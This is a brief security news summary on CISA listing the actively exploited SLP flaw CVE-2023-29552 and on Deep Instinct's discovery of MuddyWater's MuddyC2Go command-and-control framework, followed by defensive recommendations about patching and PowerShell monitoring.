The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity flaw in the Service Location Protocol (SLP) to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerability, tracked as CVE-2023-29552 (CVSS score: 7.5), could be exploited to launch massive denial-of-service (DoS) amplification attacks.
CISA has urged organizations to patch the vulnerability immediately or disable the SLP service on systems running on untrusted networks.
MuddyWater Uses New C2 Framework
Security researchers at Deep Instinct have discovered a new command-and-control (C2) framework dubbed MuddyC2Go that is being used by Iranian nation-state actors to target Israel. MuddyC2Go is a web-based C2 framework written in the Go programming language.
MuddyC2Go is believed to have been in use since early 2020 and has been used in place of PhonyC2, another custom C2 platform from MuddyWater. MuddyC2Go is deployed on compromised systems using a password-protected archive that contains an embedded PowerShell script. The PowerShell script automatically connects to MuddyC2Go’s C2 server, eliminating the need for manual execution by the operator.
MuddyC2Go is suspected to be a framework that is responsible for generating PowerShell payloads in order to conduct post-exploitation activities. Deep Instinct recommends disabling PowerShell if it is not needed, or closely monitoring PowerShell activity if it is enabled.
The addition of CVE-2023-29552 to the KEV catalog and the discovery of MuddyC2Go are both significant developments in the cybersecurity landscape. The SLP DoS vulnerability is a high-severity flaw that could be exploited to launch devastating attacks against organizations. MuddyC2Go is a new C2 framework that is being used by a sophisticated threat actor to target high-value targets.
Organizations should take steps to mitigate these risks by patching the SLP vulnerability, disabling PowerShell if it is not needed, and closely monitoring PowerShell activity. Organizations should also be aware of the latest threat intelligence and implement appropriate security controls to protect their systems from attack.
- Patch the SLP vulnerability (CVE-2023-29552) immediately.
- Disable the SLP service on systems running on untrusted networks.
- Disable PowerShell if it is not needed.
- Closely monitor PowerShell activity.
- Implement appropriate security controls to protect your systems from attack.